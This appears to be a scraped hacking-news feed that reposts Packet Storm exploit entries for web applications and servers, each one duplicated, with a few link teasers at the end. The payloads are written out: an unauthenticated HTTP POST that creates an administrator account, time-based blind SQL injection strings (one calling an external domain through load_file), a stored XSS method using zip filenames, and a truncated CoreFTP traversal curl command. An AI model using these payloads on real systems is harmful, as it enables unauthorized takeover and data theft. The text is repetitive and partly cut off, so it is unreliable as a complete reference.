Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Railway Reservation System 1.0 Missing Access Control
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Online Railway Reservation System version 1.0 suffers from an administrative account creation vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Railway Reservation System 1.0 Missing Access Control
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Online Railway Reservation System version 1.0 suffers from an administrative account creation vulnerability.
MD5 |
f2d1bce831fb6d7cf35634e3999ff1c2Download
#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0
=====================================================================================================================================
Account Creation
=====================================================================================================================================
POST /orrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
Content-Length: 602
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="firstname"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="lastname"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="username"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="password"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="type"
1
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Railway Reservation System 1.0 Missing Access Control
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
VUPlayer 2.49 Buffer Overflow
https://4.bp.blogspot.com/-gp6vAY2GXMM/WWlvG3cWkQI/AAAAAAAAILY/aMDesAGFEocqJU-7SaIaO870_Bbf2ZUHACLcBGAs/s1600/h139.png
VUPlayer version 2.49 .wax local buffer overflow exploit with DEP bypass.
MD5 |
Download
# Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
# Date: 26/06/2021
# Exploit Author: Bryan Leong
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
VUPlayer 2.49 Buffer Overflow
https://4.bp.blogspot.com/-gp6vAY2GXMM/WWlvG3cWkQI/AAAAAAAAILY/aMDesAGFEocqJU-7SaIaO870_Bbf2ZUHACLcBGAs/s1600/h139.png
VUPlayer version 2.49 .wax local buffer overflow exploit with DEP bypass.
MD5 |
53e64485c577d217ccced27894c8003aDownload
# Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
# Date: 26/06/2021
# Exploit Author: Bryan Leong
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
VUPlayer 2.49 Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Linux unix GC Memory Corruption
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
Linux suffers from a garbage collection memory corruption vulnerability by resurrecting a file reference through RCU.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Linux unix GC Memory Corruption
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
Linux suffers from a garbage collection memory corruption vulnerability by resurrecting a file reference through RCU.
MD5 |
78b6ea0bece0d083ab283dbd9b1ddddcDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Linux unix GC Memory Corruption
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
HTTP Commander 3.1.9 Cross Site Scripting
https://3.bp.blogspot.com/-D2NV3HnXxpM/WWlu9YoBNhI/AAAAAAAAIJs/rLrqFdeLLWYSGUQPyN0O7DuhnXu7T_FjQCLcBGAs/s1600/h114.png
HTTP Commander version 3.1.9 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
HTTP Commander 3.1.9 Cross Site Scripting
https://3.bp.blogspot.com/-D2NV3HnXxpM/WWlu9YoBNhI/AAAAAAAAIJs/rLrqFdeLLWYSGUQPyN0O7DuhnXu7T_FjQCLcBGAs/s1600/h114.png
HTTP Commander version 3.1.9 suffers from a persistent cross site scripting vulnerability.
MD5 |
6bb7f0bab3b4b05843b6af6b797dc597Download
# Exploit Title: HTTP Commander 3.1.9 - Stored Cross Site Scripting (XSS)
# Date: 07/01/2022
# Exploit Author: Oscar Sandén
# Vendor Homepage: https://www.element-it.com
# Software Link: https://www.element-it.com/downloads.aspx
# Version: 3.1.9
# Tested on: Windows Server 2016
[Description]
There is a stored XSS in the 'Zip content' feature of the HTTP commander application. The vulnerable field is the filename of the files inside the zip. This vulnerability exists in 3.x of the HTTP commander application.
[Steps to reproduce]
1) Create a file with a xxs payload in its name. Examples:
x .txt
x .txt
Or some other JS you like.
2) Zip the files
3) Upload the ZIP-file
4) In HTTP commander, right click the file and select ZIP-content.
5) If the files are in a subfolder, expand it until the filenames are shown.
[Exploit]
touch payload/x .txt
Zip -r test.zip /payload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
HTTP Commander 3.1.9 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Online Examination System Project 1.0 SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Online Examination System Project 1.0 SQL Injection
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Examination System Project 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Resort Management System 1.0 SQL Injection
https://2.bp.blogspot.com/-byy861XuXi0/WWlvWQTmcNI/AAAAAAAAIOI/mFealIoTV44qfFUu4oCqUAhEFYGzd1o3ACLcBGAs/s1600/h49.png
Online Resort Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
## Title: Online Resort Management System 1.0 SQL - Injections
## Author: nu11secur1ty
## Date: 01.09.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html
## Description:
The id parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\g5m5022yoztcb375vu5zomhbn2tvhl5c80znqbf.chushkopeks.net\\qru'))+'
was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
The attacker can take account control of all accounts plus an
administrator account on this system.
Status: CRITICAL
[+] Payload:
```mysql
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_room&id=5'+(select
load_file('\\\\g5m5022yoztcb375vu5zomhbn2tvhl5c80znqbf.chushkopek.net\\qru'))+''
AND (SELECT 7995 FROM (SELECT(SLEEP(3)))MQXi) AND 'RNQM'='RNQM
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Online-Resort-Management-System-1.0)
## Proof and Exploit:
[href](https://streamable.com/524sxp)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Resort Management System 1.0 SQL Injection
https://2.bp.blogspot.com/-byy861XuXi0/WWlvWQTmcNI/AAAAAAAAIOI/mFealIoTV44qfFUu4oCqUAhEFYGzd1o3ACLcBGAs/s1600/h49.png
Online Resort Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
b05c7d2cadea20813192a722bdd2ef27Download
## Title: Online Resort Management System 1.0 SQL - Injections
## Author: nu11secur1ty
## Date: 01.09.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html
## Description:
The id parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\g5m5022yoztcb375vu5zomhbn2tvhl5c80znqbf.chushkopeks.net\\qru'))+'
was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
The attacker can take account control of all accounts plus an
administrator account on this system.
Status: CRITICAL
[+] Payload:
```mysql
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_room&id=5'+(select
load_file('\\\\g5m5022yoztcb375vu5zomhbn2tvhl5c80znqbf.chushkopek.net\\qru'))+''
AND (SELECT 7995 FROM (SELECT(SLEEP(3)))MQXi) AND 'RNQM'='RNQM
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Online-Resort-Management-System-1.0)
## Proof and Exploit:
[href](https://streamable.com/524sxp)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Resort Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
CoreFTP Server Build 725 Directory Traversal
https://4.bp.blogspot.com/-5kb4UTwsKkE/WWlvjussFoI/AAAAAAAAIQs/uqojaqb90NcMo4ROOoH-c5uvdKeDdbGswCLcBGAs/s1600/h94.png
CoreFTP server build version 725 suffers from a directory traversal vulnerability.
MD5 |
Download
# Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)
# Date: 08/01/2022
# Exploit Author: LiamInfosec
# Vendor Homepage: http://coreftp.com/
# Version: build 725 and below
# Tested on: Windows 10
# CVE : CVE-2022-22836
# Description:
CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.
# Proof of Concept:
curl -k -X PUT -H "Host:
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
CoreFTP Server Build 725 Directory Traversal
https://4.bp.blogspot.com/-5kb4UTwsKkE/WWlvjussFoI/AAAAAAAAIQs/uqojaqb90NcMo4ROOoH-c5uvdKeDdbGswCLcBGAs/s1600/h94.png
CoreFTP server build version 725 suffers from a directory traversal vulnerability.
MD5 |
23709190a7e9ca64fcf97880d8565221Download
# Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)
# Date: 08/01/2022
# Exploit Author: LiamInfosec
# Vendor Homepage: http://coreftp.com/
# Version: build 725 and below
# Tested on: Windows 10
# CVE : CVE-2022-22836
# Description:
CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.
# Proof of Concept:
curl -k -X PUT -H "Host:
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
CoreFTP Server Build 725 Directory Traversal
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Railway Reservation System 1.0 SQL Injection
https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png
Online Railway Reservation System version 1.0 suffers from an unauthenticated remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Railway Reservation System 1.0 SQL Injection
https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png
Online Railway Reservation System version 1.0 suffers from an unauthenticated remote SQL injection vulnerability.
MD5 |
2a0806303eb3cb758ed3f98588e91417Download
# Exploit Title: Online Railway Reservation System 1.0 - 'id' SQL Injection (Unauthenticated)
# Date: 07/01/2022
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4,PHP 7.4.26
*SQL Injection*
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to it's database. Online Railway Reservation System v1.0 is vulnerable to SQL injection via the 'id' parameter on the Reservation Form.
*Attack Vector*
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.
*Steps of reproduce:*
Step-1: Navigate to 'Schedule' > go to 'Book' or 'Revervation Form' page using the following URL:
http://localhost/orrs/?page=reserve&sid=1
Step-2: Put the SQL Injection payloads in 'id' field.
In this we used time-based blind payload: /orrs/?page=reserve&sid=1') AND (SELECT 6842 FROM (SELECT(SLEEP(5)))UsWr) AND ('WBCm'='WBCm
Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Railway Reservation System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Domain Escalation – sAMAccountName Spoofing
https://www.reddit.com/r/redteamsec/comments/s0qvq6/domain_escalation_samaccountname_spoofing/
submitted by /u/netbiosX (https://www.reddit.com/user/netbiosX)
[link] (https://pentestlab.blog/2022/01/10/domain-escalation-samaccountname-spoofing/) [comments] (https://www.reddit.com/r/redteamsec/comments/s0qvq6/domain_escalation_samaccountname_spoofing/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/s0qvq6/domain_escalation_samaccountname_spoofing/
submitted by /u/netbiosX (https://www.reddit.com/user/netbiosX)
[link] (https://pentestlab.blog/2022/01/10/domain-escalation-samaccountname-spoofing/) [comments] (https://www.reddit.com/r/redteamsec/comments/s0qvq6/domain_escalation_samaccountname_spoofing/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Domain Escalation – sAMAccountName Spoofing
Posted in r/redteamsec by u/netbiosX • 3 points and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Flash Player has been discontinued for almost a year, so what exactly are you updating?
https://cdn-images-1.medium.com/max/1200/1*9YVxnHwyhinrOeCWk1nxhQ.jpeg
You’re completely right if you were astonished to receive a notification for Flash Player updates on your phone, assuming it had died…
Continue reading on Medium »
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
Flash Player has been discontinued for almost a year, so what exactly are you updating?
https://cdn-images-1.medium.com/max/1200/1*9YVxnHwyhinrOeCWk1nxhQ.jpeg
You’re completely right if you were astonished to receive a notification for Flash Player updates on your phone, assuming it had died…
Continue reading on Medium »
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
Medium
Flash Player has been discontinued for almost a year, so what exactly are you updating?
You’re completely right if you were astonished to receive a notification for Flash Player updates on your phone, assuming it had died years…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Here’s How Hackathons Can Equate to Baking Cakes
https://cdn-images-1.medium.com/max/600/1*ebJW-1hFEvdUEvo7KBJEHA.jpeg
Audrey has been attending a lot of hackathons in the past year. She came to the conclusion that hackathons are just like baking cakes.
Continue reading on TechTogether »
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
Here’s How Hackathons Can Equate to Baking Cakes
https://cdn-images-1.medium.com/max/600/1*ebJW-1hFEvdUEvo7KBJEHA.jpeg
Audrey has been attending a lot of hackathons in the past year. She came to the conclusion that hackathons are just like baking cakes.
Continue reading on TechTogether »
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
Medium
Here’s How Hackathons Can Equate to Baking Cakes
Audrey has been attending a lot of hackathons in the past year. She came to the conclusion that hackathons are just like baking cakes.